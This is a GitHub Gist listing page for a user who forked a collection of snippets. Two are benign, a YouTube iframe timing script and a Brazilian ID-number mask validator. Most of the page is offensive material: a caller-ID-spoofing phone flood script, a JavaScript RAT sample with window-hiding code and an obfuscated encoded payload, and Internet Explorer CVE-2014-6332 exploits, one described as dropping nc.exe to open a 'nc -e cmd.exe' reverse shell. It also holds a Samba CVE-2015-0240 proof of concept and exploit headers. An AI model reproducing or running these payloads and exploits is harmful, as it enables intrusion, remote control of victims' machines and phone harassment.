Skip to content

Instantly share code, notes, and snippets.

@hackernix10
hackernix10 / current-time-events.html
Created August 24, 2020 04:19 — forked from andrebian/current-time-events.html
Youtube iframe API - Eventos baseado no tempo atual do video (current time events)
<div id="player" data-video-id="ZZ5LpwO-An4"></div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
<script type="text/javascript">
var tag = document.createElement('script');
var firstScriptTag = document.getElementsByTagName('script')[0];
// O container do video
var playerDiv = $('#player');
@hackernix10
hackernix10 / validacao+mascara.js
Created June 28, 2020 02:33 — forked from ricardodantas/validacao+mascara.js
Máscara e validação de RG, CNPJ, CPF, etc...
// JavaScript Document
//adiciona mascara de cnpj
function MascaraCNPJ(cnpj){
if(mascaraInteiro(cnpj)==false){
event.returnValue = false;
}
return formataCampo(cnpj, '00.000.000/0000-00', event);
}
//adiciona mascara de cep
#!/usr/bin/python
"""
advanced-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number and spoofs caller ID making it
@hackernix10
hackernix10 / JavaScript RAT
Created March 26, 2019 04:57 — forked from JohnLaTwC/JavaScript RAT
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
var a="'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'02v{rg'1F'00vgzv-hctcqapkrv'00'1Gtcp'02n2n'1F'05IiQIraAdleAfrzEax7{HqnGdiDUXmL2O:@F`FHFdHHWL:DF`uKFdHzEPxu1ZqL2O:DF`@LFdwn0`szJfqTZ[oTEXALFdqn2S{u1LqH2O:T0ajLoS1u1OGDZLj;WO3HhLs@hO:zUQFLFduChO:@F`@LFd27UXvfUXx;DahjEXdPEXjzJ`HjhO:@F`AfFd6u0SxuZcqP2O:Pl`n3Ufh;EXAfFdqDofnH2L:LF`uKFd2uEM{ulLqLiO:j0[2n0fxH2L:HZ[0DGO:DxZ:fxSxuJfxTUfzToWuPJfKzWV[@hO:7igrH2O:HF`uKFdq;DM{uZOqjhO:PF`ALFdP7GWMnZUmjFcVXF`u@lS1uZW0jFT2fVgmjhO:TEajL0an7Uf6KFd0uoSxuZW0jFT2fVgmP2O:@F`ALFd1uEM{uZLqH2L:nEU1[DL2XEV{OWT[nx[iHEO{uZcq@hO:nF`6KFd7u0S{uZQqLiO:zUcFHFdHLiO:fF`uKFdnLJ`nP2L:LZc4P2O:fFO{uJMxnogALFd3uEM{uZcqLiO:nG`ALFdqf0`3DlS1ulatHlan70`:f1`i7Uc1H2O:TUf{PJO{uZg3n0L{ulPRrlSxuZMqH2L:DxZGLFd6u0S{uJ`tL0`2;oauzlPRrZO{uJa2PJc:HZX{HZXoToa:X0LrH2O:TE`rXoO{uJMuKFdoToa:LoaxPZXlzlOqDhO:TE`rj0fALFdz:3S{uJL3GhO0GFPxuJMxnogGLFdMrZczKFdn@Z[hLJfn70L{u1`rHZ[i7UfhT0Wx7EPx@hO:;Uc{DU`rHJWx7EPx@hO:nEajnlanTZaszZgjzEaxnEX{KFdn70`wD2O:L1f6KFdn@Z[hLZXwTJdOHTT:;Uchno`HnFO:HVMzChO:nEM{ulOEHWOpHx[3nDa6SZO{C1SxuZcrHWL:
@hackernix10
hackernix10 / firstpart.js
Created March 20, 2019 16:19 — forked from weltonrodrigo/firstpart.js
Code found on some google-analytics hijack
<script type="text/javascript">
function Carregar(url, callback)
{
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = url;
script.onreadystatechange = callback;
script.onload = callback;
@hackernix10
hackernix10 / cve-2014-6332_win7_ie11_poc.html
Created March 20, 2019 15:09 — forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
@hackernix10
hackernix10 / cve-2014-6332_exploit.html
Created March 20, 2019 15:09 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)
@hackernix10
hackernix10 / cve-2015-0240_samba_poc
Created March 20, 2019 15:09 — forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@hackernix10
hackernix10 / cve-2015-0240_samba_exploit.py
Created March 20, 2019 15:09 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/